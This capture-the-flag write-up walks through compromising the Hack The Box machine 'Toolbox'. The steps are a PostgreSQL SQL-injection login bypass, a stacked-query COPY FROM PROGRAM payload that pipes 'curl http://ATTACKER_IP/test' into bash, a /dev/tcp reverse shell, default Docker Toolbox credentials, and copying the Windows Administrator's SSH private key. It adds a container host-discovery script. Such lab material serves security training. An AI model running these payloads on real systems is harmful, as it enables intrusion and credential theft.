Toolbox is a hybrid Windows/Linux machine that exposes an SQL‑injectable login panel backed by PostgreSQL. The SQL injection allows command execution, giving a shell inside a Docker container. From there, the Docker Toolbox architecture reveals a VirtualBox‑based Docker host with default credentials. The host exposes the Windows filesystem, allowing retrieval of the Administrator SSH key and full compromise.
Target: toolbox.htb
Initial vector: PostgreSQL SQL injection → RCE
Lateral movement: Docker Toolbox VM (default creds)
Privilege escalation: Windows Administrator SSH key from shared folder
Nmap:
21/tcp   ftp    (anonymous login allowed)
22/tcp   ssh    (OpenSSH for Windows)
443/tcp  https  (Apache 2.4.38)
445/tcp  smb
5985/tcp winrm
Anonymous FTP reveals:
docker-toolbox.exe
This strongly suggests the host uses Docker Toolbox, which runs the Docker engine inside a VirtualBox VM (boot2docker) and shares the Windows user directory with that VM as a VirtualBox shared folder.
The HTTPS site presents two domains:
megalogistic.com
admin.megalogistic.com
Add both to /etc/hosts.
The admin panel at admin.megalogistic.com contains a login form vulnerable to SQL injection.
Test the login form:
admin' or 1=1-- -
This bypasses authentication. Logging out reveals an error message referencing PostgreSQL, confirming the backend DBMS.
PostgreSQL (9.3 and later) can run an operating-system command through COPY ... FROM PROGRAM, but only when the role the application connects as is a superuser or, from PostgreSQL 11, a member of pg_execute_server_program. The login query here runs with that privilege and the backend accepts stacked queries, so a second statement can be appended after the closing quote. COPY also needs an existing target table, so create one in the same stacked query.
Use Burp to intercept a login request and replace the username field with the following (URL-encode the quotes, spaces and semicolons before sending, since the body is application/x-www-form-urlencoded):
username=admin'; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'curl http://ATTACKER_IP/test | bash'; -- - &password=admin
Serve the following reverse shell script as http://ATTACKER_IP/test, the path the injected curl fetches (a web server on port 80 in the directory that holds the file is enough):
#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1
Listener:
$ nc -nlvp 443
Trigger the request and a shell is obtained — inside a Docker container.
Check the container's IP (ifconfig is missing from many minimal images; the routing table in /proc/net/route gives the same information):
$ ifconfig -> 172.17.0.2
Docker Toolbox runs the engine in a VirtualBox VM, so the Docker host seen from the container is that VM, not Windows. On the default bridge network the host side of docker0 is the container's default gateway, which is 172.17.0.1 unless the bridge subnet was changed:
172.17.0.1
Test SSH connectivity with bash's /dev/tcp pseudo-device, which works even when nc and nmap are absent from the container:
$ echo '' > /dev/tcp/172.17.0.1/22 && echo OPEN
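Host discovery from inside the container, as an added example rather than part of the original writeup: it reads the default gateway from /proc/net/route instead of assuming 172.17.0.1, and probes TCP ports with /dev/tcp. The embedded routing table is a constructed sample for a container on the default bridge; on the real target the function reads the live file.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: locate the Docker host from inside a
# container without ifconfig and without assuming the bridge gateway is 172.17.0.1,
# then check whether SSH on it is reachable using bash's /dev/tcp.

# /proc/net/route stores addresses as 8 little-endian hex digits: 010011AC -> 172.17.0.1
hex_to_ip() {
    local h=$1 a b c d rest
    a=${h%??????}; rest=${h#??}
    b=${rest%????}; rest=${rest#??}
    c=${rest%??};   d=${rest#??}
    printf '%d.%d.%d.%d\n' "0x$d" "0x$c" "0x$b" "0x$a"
}

# Print the default gateway from a /proc/net/route-format file (the live file by default).
# On the default docker0 bridge this is the host side of the bridge, normally 172.17.0.1.
default_gateway() {
    local route_file=${1:-/proc/net/route} iface dest gw flags rest
    while read -r iface dest gw flags rest; do
        # destination 0.0.0.0 with RTF_GATEWAY (0x2) set is the default route;
        # the header line fails the first test, so its Flags text is never evaluated
        if [ "$dest" = "00000000" ] && [ $((0x$flags & 2)) -ne 0 ]; then
            hex_to_ip "$gw"
            return 0
        fi
    done < "$route_file"
    return 1
}

# Probe one TCP port with bash's /dev/tcp (no nc or nmap needed in the container).
# Succeeds only if the connect completes within 3 seconds.
tcp_open() {
    local host=$1 port=$2
    timeout 3 bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# Constructed sample of /proc/net/route for a container at 172.17.0.2 on the default bridge.
write_sample_route() {
    cat > "$1" <<'EOF'
Iface Destination Gateway  Flags RefCnt Use Metric Mask     MTU Window IRTT
eth0  00000000    010011AC 0003  0      0   0      00000000 0   0      0
eth0  000011AC    00000000 0001  0      0   0      0000FFFF 0   0      0
EOF
}

# Usage inside the container: PROBE=1 bash thisfile.sh
if [ -n "${PROBE:-}" ]; then
    [ -f /.dockerenv ] && echo "[*] /.dockerenv present: running inside a Docker container"
    gw=$(default_gateway) && echo "[*] default gateway (the Docker host): $gw"
    tcp_open "$gw" 22 && echo "[+] $gw:22 open, try ssh docker@$gw"
fi
```

If the gateway is not 172.17.0.1, the daemon was started with a non-default bridge subnet or the container sits on a user-defined network; the gateway printed here is still the address to SSH to.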
Default Docker Toolbox (boot2docker) credentials, which the VM ships with unless they were changed:
docker : tcuser
SSH into the Docker host:
$ ssh docker@172.17.0.1
Password: tcuser
The Docker Toolbox VM mounts the Windows host's C:\Users directory as a VirtualBox shared folder under:
/c/Users
Navigate to the Administrator folder:
$ cd /c/Users/Administrator/.ssh
Retrieve id_rsa, copy it to your attacker machine, and restrict its permissions (ssh refuses a world-readable key):
$ scp docker@172.17.0.1:/c/Users/Administrator/.ssh/id_rsa .
$ chmod 600 id_rsa
SSH directly into the Windows host:
$ ssh -i id_rsa administrator@toolbox.htb
Administrator access obtained. Root flag is located on the Windows desktop.
Toolbox is a clever hybrid machine: PostgreSQL SQL injection leads to RCE inside a Docker container, which in turn exposes a VirtualBox‑based Docker Toolbox VM with default credentials. Because the VM mounts the Windows host’s user directories, the Administrator SSH key is easily recovered, resulting in full system compromise.